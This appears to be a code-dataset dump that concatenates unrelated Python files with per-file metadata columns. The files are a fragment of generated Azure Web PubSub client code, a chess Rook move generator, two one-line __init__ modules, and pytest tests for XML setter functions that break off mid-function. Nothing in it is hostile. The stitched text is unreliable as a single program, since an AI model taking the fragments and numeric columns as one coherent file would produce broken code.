) -> None:
"""Revoke permission for the connection.
Revoke permission for the connection.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param permission: The permission: current supported actions are joinLeaveGroup and
sendToGroup. Possible values are: "sendToGroup" or "joinLeaveGroup".
:type permission: str
:param connection_id: Target connection Id.
:type connection_id: str
:keyword target_name: The meaning of the target depends on the specific permission. For
joinLeaveGroup and sendToGroup, targetName is a required parameter standing for the group name.
:paramtype target_name: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_revoke_permission_request(
hub=hub,
permission=permission,
connection_id=connection_id,
target_name=target_name,
template_url=self.revoke_permission.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
revoke_permission.metadata = {'url': '/api/hubs/{hub}/permissions/{permission}/connections/{connectionId}'} # type: ignore
@distributed_trace_async
async def check_permission(
self,
hub: str,
permission: str,
connection_id: str,
*,
target_name: Optional[str] = None,
**kwargs: Any
) -> None:
"""Check if a connection has permission to the specified action.
Check if a connection has permission to the specified action.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param permission: The permission: current supported actions are joinLeaveGroup and
sendToGroup. Possible values are: "sendToGroup" or "joinLeaveGroup".
:type permission: str
:param connection_id: Target connection Id.
:type connection_id: str
:keyword target_name: The meaning of the target depends on the specific permission. For
joinLeaveGroup and sendToGroup, targetName is a required parameter standing for the group name.
:paramtype target_name: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_check_permission_request(
hub=hub,
permission=permission,
connection_id=connection_id,
target_name=target_name,
template_url=self.check_permission.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
check_permission.metadata = {'url': '/api/hubs/{hub}/permissions/{permission}/connections/{connectionId}'} # type: ignore
| 38.933552
| 719
| 0.636241
| 5,290
| 47,460
| 5.523629
| 0.046314
| 0.027379
| 0.017796
| 0.030116
| 0.941752
| 0.921766
| 0.895414
| 0.868207
| 0.848392
| 0.833333
| 0
| 0.00882
| 0.266603
| 47,460
| 1,218
| 720
| 38.965517
| 0.830666
| 0.025095
| 0
| 0.764457
| 0
| 0
| 0.082096
| 0.046691
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012694
| 0
| 0.043724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c02cb6ee5cfe32b54b7d7d6bc865a23c571f0f6
| 2,991
|
py
|
Python
|
engine/pieces/rook.py
|
LucasG0/chess-engine-ai
|
65f2dcec3cb3e02b4b2a5a79391a734d86fb13e3
|
[
"MIT"
] | null | null | null |
engine/pieces/rook.py
|
LucasG0/chess-engine-ai
|
65f2dcec3cb3e02b4b2a5a79391a734d86fb13e3
|
[
"MIT"
] | null | null | null |
engine/pieces/rook.py
|
LucasG0/chess-engine-ai
|
65f2dcec3cb3e02b4b2a5a79391a734d86fb13e3
|
[
"MIT"
] | null | null | null |
from engine.pieces.piece import Piece
from engine.position import Position
class Rook(Piece):
def __init__(self,color):
super(Rook,self).__init__("R",color,4)
@staticmethod
def pseudo_legal_pos(from_x, from_y, config, color):
pos = []
board = config.board
i = 1
while from_x+i < 8 and board[from_x+i][from_y].is_empty():
pos.append(Position(from_x+i,from_y))
i += 1
if from_x+i < 8 and not(board[from_x+i][from_y].is_empty()) and board[from_x+i][from_y].piece.color != color:
pos.append(Position(from_x+i,from_y))
i = 1
while from_x-i >= 0 and board[from_x-i][from_y].is_empty():
pos.append(Position(from_x-i,from_y))
i += 1
if from_x-i >= 0 and not(board[from_x-i][from_y].is_empty()) and board[from_x-i][from_y].piece.color != color:
pos.append(Position(from_x-i,from_y))
i = 1
while from_y+i < 8 and board[from_x][from_y+i].is_empty():
pos.append(Position(from_x,from_y+i))
i += 1
if from_y+i < 8 and not(board[from_x][from_y+i].is_empty()) and board[from_x][from_y+i].piece.color != color:
pos.append(Position(from_x,from_y+i))
i = 1
while from_y-i >= 0 and board[from_x][from_y-i].is_empty():
pos.append(Position(from_x,from_y-i))
i += 1
if from_y-i >= 0 and not(board[from_x][from_y-i].is_empty()) and board[from_x][from_y-i].piece.color != color:
pos.append(Position(from_x,from_y-i))
return pos
@staticmethod
def threats_pos(from_x, from_y, config, color):
pos = []
board = config.board
i = 1
while from_x+i < 8 and board[from_x+i][from_y].is_empty():
pos.append(Position(from_x+i,from_y))
i += 1
if from_x+i < 8:
pos.append(Position(from_x+i,from_y))
i = 1
while from_x-i >= 0 and board[from_x-i][from_y].is_empty():
pos.append(Position(from_x-i,from_y))
i += 1
if from_x-i >= 0:
pos.append(Position(from_x-i,from_y))
i = 1
while from_y+i < 8 and board[from_x][from_y+i].is_empty():
pos.append(Position(from_x,from_y+i))
i += 1
if from_y+i < 8:
pos.append(Position(from_x,from_y+i))
i = 1
while from_y-i >= 0 and board[from_x][from_y-i].is_empty():
pos.append(Position(from_x,from_y-i))
i += 1
if from_y-i >= 0:
pos.append(Position(from_x,from_y-i))
return pos
def get_pseudo_legal_pos(self, from_x, from_y, config):
return Rook.pseudo_legal_pos(from_x,from_y,config,self.color)
def get_threats_pos(self, from_x, from_y, config):
return Rook.threats_pos(from_x,from_y,config,self.color)
| 39.88
| 122
| 0.558676
| 494
| 2,991
| 3.133603
| 0.074899
| 0.148579
| 0.124031
| 0.142119
| 0.885013
| 0.885013
| 0.885013
| 0.875969
| 0.825581
| 0.782946
| 0
| 0.015919
| 0.306921
| 2,991
| 74
| 123
| 40.418919
| 0.730825
| 0
| 0
| 0.716418
| 0
| 0
| 0.000334
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074627
| false
| 0
| 0.029851
| 0.029851
| 0.179104
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c2adcd3fb5c69974c3516612b7795920c27fd0d
| 45
|
py
|
Python
|
src/mcr2/objective/supervised/__init__.py
|
DruvPai/mcr2
|
d1cc05418349a3071be7a523609058d85046b1ab
|
[
"MIT"
] | null | null | null |
src/mcr2/objective/supervised/__init__.py
|
DruvPai/mcr2
|
d1cc05418349a3071be7a523609058d85046b1ab
|
[
"MIT"
] | null | null | null |
src/mcr2/objective/supervised/__init__.py
|
DruvPai/mcr2
|
d1cc05418349a3071be7a523609058d85046b1ab
|
[
"MIT"
] | null | null | null |
from . import coding_rate
from . import loss
| 15
| 25
| 0.777778
| 7
| 45
| 4.857143
| 0.714286
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 45
| 2
| 26
| 22.5
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9c4f28d744366a182631518b5f9e3bd439b7bbf8
| 28,985
|
py
|
Python
|
tests/xml/test_xml_setters_basic.py
|
JuDFTteam/masci-tools
|
f08f004bf9db99b687a3c67d6c82e628a9231634
|
[
"MIT"
] | 15
|
2018-11-07T10:04:46.000Z
|
2021-11-08T20:51:08.000Z
|
tests/xml/test_xml_setters_basic.py
|
JuDFTteam/masci-tools
|
f08f004bf9db99b687a3c67d6c82e628a9231634
|
[
"MIT"
] | 120
|
2020-02-04T15:37:42.000Z
|
2022-03-17T10:49:40.000Z
|
tests/xml/test_xml_setters_basic.py
|
JuDFTteam/masci-tools
|
f08f004bf9db99b687a3c67d6c82e628a9231634
|
[
"MIT"
] | 11
|
2018-10-18T08:09:07.000Z
|
2022-02-22T15:45:21.000Z
|
# -*- coding: utf-8 -*-
"""
Tests for the basic xml setter functions
"""
import pytest
TEST_INPXML_PATH = 'fleur/Max-R5/FePt_film_SSFT_LO/files/inp2.xml'
def test_xml_set_attrib_value_no_create(load_inpxml):
"""
Basic test of the functionality of xml_set_attrib_value_no_create
"""
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_set_attrib_value_no_create
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert len(eval_xpath(root, '/fleurInput/@TEST_ATT', list_return=True)) == 0
xmltree = xml_set_attrib_value_no_create(xmltree, '/fleurInput', 'TEST_ATT', 'test')
assert str(eval_xpath(root, '/fleurInput/@TEST_ATT')) == 'test'
def test_xml_set_attrib_value_no_create_not_str(load_inpxml):
"""
Test of the automatic conversion to string xml_set_attrib_value_no_create
"""
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_set_attrib_value_no_create
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert len(eval_xpath(root, '/fleurInput/@TEST_ATT', list_return=True)) == 0
xmltree = xml_set_attrib_value_no_create(xmltree, '/fleurInput', 'TEST_ATT', 2145)
assert str(eval_xpath(root, '/fleurInput/@TEST_ATT')) == '2145'
def test_xml_set_attrib_value_no_create_errors(load_inpxml):
"""
Test of the error messages in xml_set_attrib_value_no_create
"""
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_set_attrib_value_no_create
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
with pytest.raises(ValueError, match='Wrong value for occurrences'):
xml_set_attrib_value_no_create(xmltree,
'/fleurInput/atomSpecies/species/mtSphere',
'radius',
'test',
occurrences=5)
with pytest.raises(ValueError, match='Wrong length for attribute values'):
xml_set_attrib_value_no_create(xmltree,
'/fleurInput/atomSpecies/species/mtSphere',
'radius', ['test', 'too_much'],
occurrences=[1])
assert eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere/@radius') == ['2.20000000', '2.20000000']
TEST_ATTRIB_RESULTS = [['test', 'test'], ['test', 'test2'], ['test', '2214'], ['test', '2.20000000'],
['2.20000000', 'test']]
TEST_ATTRIBV = ['test', ['test', 'test2'], ['test', 2214], 'test', ['test']]
TEST_OCCURENCES = [None, None, None, 0, [-1]]
@pytest.mark.parametrize('attribv, expected_result,occurrences', zip(TEST_ATTRIBV, TEST_ATTRIB_RESULTS,
TEST_OCCURENCES))
def test_xml_set_attrib_value_no_create_all(load_inpxml, attribv, expected_result, occurrences):
"""
Test of the functionality of xml_set_attrib_value_no_create with multiple occurrences
of the sttribute and different values for occurrences
"""
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_set_attrib_value_no_create
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere/@radius') == ['2.20000000', '2.20000000']
xmltree = xml_set_attrib_value_no_create(xmltree,
'/fleurInput/atomSpecies/species/mtSphere',
'radius',
attribv,
occurrences=occurrences)
assert eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere/@radius') == expected_result
def test_xml_set_text_no_create(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_set_text_no_create
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert eval_xpath(root, '/fleurInput').text.strip() == ''
xmltree = xml_set_text_no_create(xmltree, '/fleurInput', 'TEST_TEXT')
assert eval_xpath(root, '/fleurInput').text == 'TEST_TEXT'
def test_xml_set_text_no_create_errors(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_set_text_no_create
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
kpoints_xpath = '/fleurInput/cell/bzIntegration/kPointLists/kPointList/kPoint'
with pytest.raises(ValueError, match='Wrong value for occurrences'):
xml_set_text_no_create(xmltree, kpoints_xpath, 'test', occurrences=5)
with pytest.raises(ValueError, match='Wrong length for text values'):
xml_set_text_no_create(xmltree, kpoints_xpath, ['test', 'too_much'], occurrences=[1])
assert eval_xpath(root, f'{kpoints_xpath}/text()') == [
' -0.250000 0.250000 0.000000', ' 0.250000 0.250000 0.000000'
]
TEST_TEXT_RESULTS = [['test', 'test'], ['test', 'test2'], ['test', ' 0.250000 0.250000 0.000000'],
[' -0.250000 0.250000 0.000000', 'test']]
TEST_TEXTS = ['test', ['test', 'test2'], 'test', ['test']]
TEST_TEXT_OCCURENCES = [None, None, 0, [-1]]
@pytest.mark.parametrize('text, expected_result,occurrences', zip(TEST_TEXTS, TEST_TEXT_RESULTS, TEST_TEXT_OCCURENCES))
def test_xml_set_text_no_create_all(load_inpxml, text, expected_result, occurrences):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_set_text_no_create
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
kpoints_xpath = '/fleurInput/cell/bzIntegration/kPointLists/kPointList/kPoint'
assert eval_xpath(root, f'{kpoints_xpath}/text()') == [
' -0.250000 0.250000 0.000000', ' 0.250000 0.250000 0.000000'
]
xmltree = xml_set_text_no_create(xmltree, kpoints_xpath, text, occurrences=occurrences)
assert eval_xpath(root, f'{kpoints_xpath}/text()') == expected_result
def test_xml_delete_tag_single(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_delete_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert len(eval_xpath(root, '/fleurInput/calculationSetup', list_return=True)) == 1
xmltree = xml_delete_tag(xmltree, '/fleurInput/calculationSetup')
assert len(eval_xpath(root, '/fleurInput/calculationSetup', list_return=True)) == 0
def test_xml_delete_tag_multiple(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_delete_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert len(eval_xpath(root, '/fleurInput/atomSpecies/species', list_return=True)) == 2
xmltree = xml_delete_tag(xmltree, '/fleurInput/atomSpecies/species')
assert len(eval_xpath(root, '/fleurInput/atomSpecies/species', list_return=True)) == 0
def test_xml_delete_tag_occurrences_single(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_delete_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert len(eval_xpath(root, '/fleurInput/atomSpecies/species', list_return=True)) == 2
xmltree = xml_delete_tag(xmltree, '/fleurInput/atomSpecies/species', occurrences=1)
assert eval_xpath(root, '/fleurInput/atomSpecies/species/@name') == 'Fe-1'
def test_xml_delete_tag_occurrences_multiple(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_delete_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert len(eval_xpath(root, '/fleurInput/atomSpecies/species', list_return=True)) == 2
xmltree = xml_delete_tag(xmltree, '/fleurInput/atomSpecies/species', occurrences=[0])
assert eval_xpath(root, '/fleurInput/atomSpecies/species/@name') == 'Pt-1'
def test_xml_delete_att_single(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_delete_att
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
keys = set([('Kmax', '4.00000000'), ('Gmax', '10.00000000'), ('GmaxXC', '8.70000000'), ('numbands', '0')])
node = eval_xpath(root, '/fleurInput/calculationSetup/cutoffs')
assert set(node.attrib.items()) == keys
xmltree = xml_delete_att(xmltree, '/fleurInput/calculationSetup/cutoffs', 'Kmax')
node = eval_xpath(root, '/fleurInput/calculationSetup/cutoffs')
keys.discard(('Kmax', '4.00000000'))
assert set(node.attrib.items()) == keys
def test_xml_delete_att_multiple(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_delete_att
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere/@radius') == ['2.20000000', '2.20000000']
xmltree = xml_delete_att(xmltree, '/fleurInput/atomSpecies/species/mtSphere', 'radius')
assert len(eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere/@radius')) == 0
def test_xml_delete_att_occurrences_single(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_delete_att
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere/@radius') == ['2.20000000', '2.20000000']
xmltree = xml_delete_att(xmltree, '/fleurInput/atomSpecies/species/mtSphere', 'radius', occurrences=1)
assert eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere/@radius') == '2.20000000'
assert eval_xpath(root, "/fleurInput/atomSpecies/species[@name='Fe-1']/mtSphere/@radius") == '2.20000000'
def test_xml_delete_att_occurrences_multiple(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_delete_att
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere/@radius') == ['2.20000000', '2.20000000']
xmltree = xml_delete_att(xmltree, '/fleurInput/atomSpecies/species/mtSphere', 'radius', occurrences=[0])
assert eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere/@radius') == '2.20000000'
assert eval_xpath(root, "/fleurInput/atomSpecies/species[@name='Pt-1']/mtSphere/@radius") == '2.20000000'
def test_xml_replace_tag_single(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_replace_tag
from lxml import etree
replace_element = etree.Element('test_tag')
replace_element.attrib['test_attrib'] = 'test'
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert len(eval_xpath(root, '/fleurInput/calculationSetup/cutoffs', list_return=True)) == 1
xmltree = xml_replace_tag(xmltree, '/fleurInput/calculationSetup/cutoffs', replace_element)
assert len(eval_xpath(root, '/fleurInput/calculationSetup/cutoffs', list_return=True)) == 0
nodes = eval_xpath(root, '/fleurInput/calculationSetup/test_tag', list_return=True)
assert len(nodes) == 1
assert nodes[0].attrib.items() == [('test_attrib', 'test')]
def test_xml_replace_tag_multiple(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_replace_tag
from lxml import etree
replace_element = etree.Element('test_tag')
replace_element.attrib['test_attrib'] = 'test'
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert len(eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere', list_return=True)) == 2
xmltree = xml_replace_tag(xmltree, '/fleurInput/atomSpecies/species/mtSphere', replace_element)
assert len(eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere', list_return=True)) == 0
nodes = eval_xpath(root, '/fleurInput/atomSpecies/species/test_tag', list_return=True)
assert len(nodes) == 2
assert nodes[0].attrib.items() == [('test_attrib', 'test')]
assert nodes[1].attrib.items() == [('test_attrib', 'test')]
def test_xml_replace_tag_occurrences_single(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_replace_tag
from lxml import etree
replace_element = etree.Element('test_tag')
replace_element.attrib['test_attrib'] = 'test'
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert len(eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere', list_return=True)) == 2
xmltree = xml_replace_tag(xmltree, '/fleurInput/atomSpecies/species/mtSphere', replace_element, occurrences=1)
assert len(eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere', list_return=True)) == 1
nodes = eval_xpath(root, "/fleurInput/atomSpecies/species[@name='Pt-1']/test_tag")
assert nodes.attrib.items() == [('test_attrib', 'test')]
def test_xml_replace_tag_occurrences_multiple(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_replace_tag
from lxml import etree
replace_element = etree.Element('test_tag')
replace_element.attrib['test_attrib'] = 'test'
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
assert len(eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere', list_return=True)) == 2
xmltree = xml_replace_tag(xmltree, '/fleurInput/atomSpecies/species/mtSphere', replace_element, occurrences=[0])
assert len(eval_xpath(root, '/fleurInput/atomSpecies/species/mtSphere', list_return=True)) == 1
nodes = eval_xpath(root, "/fleurInput/atomSpecies/species[@name='Fe-1']/test_tag")
assert nodes.attrib.items() == [('test_attrib', 'test')]
def test_xml_create_tag_string_append(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_create_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
tags = [
'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'soc', 'prodBasis', 'expertModes',
'geometryOptimization', 'ldaU'
]
node = eval_xpath(root, '/fleurInput/calculationSetup')
assert [child.tag for child in node.iterchildren()] == tags
xmltree = xml_create_tag(xmltree, '/fleurInput/calculationSetup', 'test_tag')
node = eval_xpath(root, '/fleurInput/calculationSetup')
tags.append('test_tag')
assert [child.tag for child in node.iterchildren()] == tags
def test_xml_create_tag_element_append(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_create_tag
from lxml import etree
new_element = etree.Element('test_tag')
new_element.attrib['test_attrib'] = 'test'
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
tags = [
'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'soc', 'prodBasis', 'expertModes',
'geometryOptimization', 'ldaU'
]
node = eval_xpath(root, '/fleurInput/calculationSetup')
assert [child.tag for child in node.iterchildren()] == tags
xmltree = xml_create_tag(xmltree, '/fleurInput/calculationSetup', new_element)
node = eval_xpath(root, '/fleurInput/calculationSetup')
tags.append('test_tag')
assert [child.tag for child in node.iterchildren()] == tags
assert [child.attrib.items() for child in node.iterchildren()][-1] == [('test_attrib', 'test')]
def test_xml_create_tag_insert_first(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_create_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
tags = [
'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'soc', 'prodBasis', 'expertModes',
'geometryOptimization', 'ldaU'
]
node = eval_xpath(root, '/fleurInput/calculationSetup')
assert [child.tag for child in node.iterchildren()] == tags
xmltree = xml_create_tag(xmltree, '/fleurInput/calculationSetup', 'test_tag', place_index=0)
node = eval_xpath(root, '/fleurInput/calculationSetup')
assert [child.tag for child in node.iterchildren()] == [
'test_tag', 'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'soc', 'prodBasis',
'expertModes', 'geometryOptimization', 'ldaU'
]
def test_xml_create_tag_insert_middle(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_create_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
tags = [
'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'soc', 'prodBasis', 'expertModes',
'geometryOptimization', 'ldaU'
]
node = eval_xpath(root, '/fleurInput/calculationSetup')
assert [child.tag for child in node.iterchildren()] == tags
xmltree = xml_create_tag(xmltree, '/fleurInput/calculationSetup', 'test_tag', place_index=5)
node = eval_xpath(root, '/fleurInput/calculationSetup')
assert [child.tag for child in node.iterchildren()] == [
'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'test_tag', 'soc', 'prodBasis',
'expertModes', 'geometryOptimization', 'ldaU'
]
def test_xml_create_tag_tag_order_all_single(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_create_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
tags = [
'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'soc', 'prodBasis', 'expertModes',
'geometryOptimization', 'ldaU'
]
node = eval_xpath(root, '/fleurInput/calculationSetup')
assert [child.tag for child in node.iterchildren()] == tags
order = [
'cutoffs', 'scfLoop', 'coreElectrons', 'xcFunctional', 'magnetism', 'test_tag', 'soc', 'prodBasis',
'expertModes', 'geometryOptimization', 'ldaU'
]
xmltree = xml_create_tag(xmltree, '/fleurInput/calculationSetup', 'test_tag', tag_order=order)
node = eval_xpath(root, '/fleurInput/calculationSetup')
assert [child.tag for child in node.iterchildren()] == order
def test_xml_create_tag_tag_order_multiple(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_create_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
tags = [[
'mtSphere',
'atomicCutoffs',
'electronConfig',
'energyParameters',
'lo',
'lo',
], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
order = ['mtSphere', 'atomicCutoffs', 'electronConfig', 'test_tag', 'energyParameters', 'lo']
xmltree = xml_create_tag(xmltree, '/fleurInput/atomSpecies/species', 'test_tag', tag_order=order)
tags = [[
'mtSphere',
'atomicCutoffs',
'electronConfig',
'test_tag',
'energyParameters',
'lo',
'lo',
], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'test_tag', 'energyParameters', 'lo']]
nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
def test_xml_create_tag_tag_order_multiple_selection(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_create_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
root = xmltree.getroot()
tags = [[
'mtSphere',
'atomicCutoffs',
'electronConfig',
'energyParameters',
'lo',
'lo',
], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
order = ['mtSphere', 'atomicCutoffs', 'electronConfig', 'test_tag', 'energyParameters', 'lo']
xmltree = xml_create_tag(xmltree, "/fleurInput/atomSpecies/species[@name='Fe-1']", 'test_tag', tag_order=order)
tags = [[
'mtSphere',
'atomicCutoffs',
'electronConfig',
'test_tag',
'energyParameters',
'lo',
'lo',
], ['mtSphere', 'atomicCutoffs', 'electronConfig', 'energyParameters', 'lo']]
nodes = eval_xpath(root, '/fleurInput/atomSpecies/species')
assert [[child.tag for child in node.iterchildren()] for node in nodes] == tags
def test_xml_create_tag_tag_order_multiple_beginning(load_inpxml):
from masci_tools.util.xml.common_functions import eval_xpath
from masci_tools.util.xml.xml_setters_basic import xml_create_tag
xmltree, schema_dict = load_inpxml(TEST_INPXML_PATH, absolute=False)
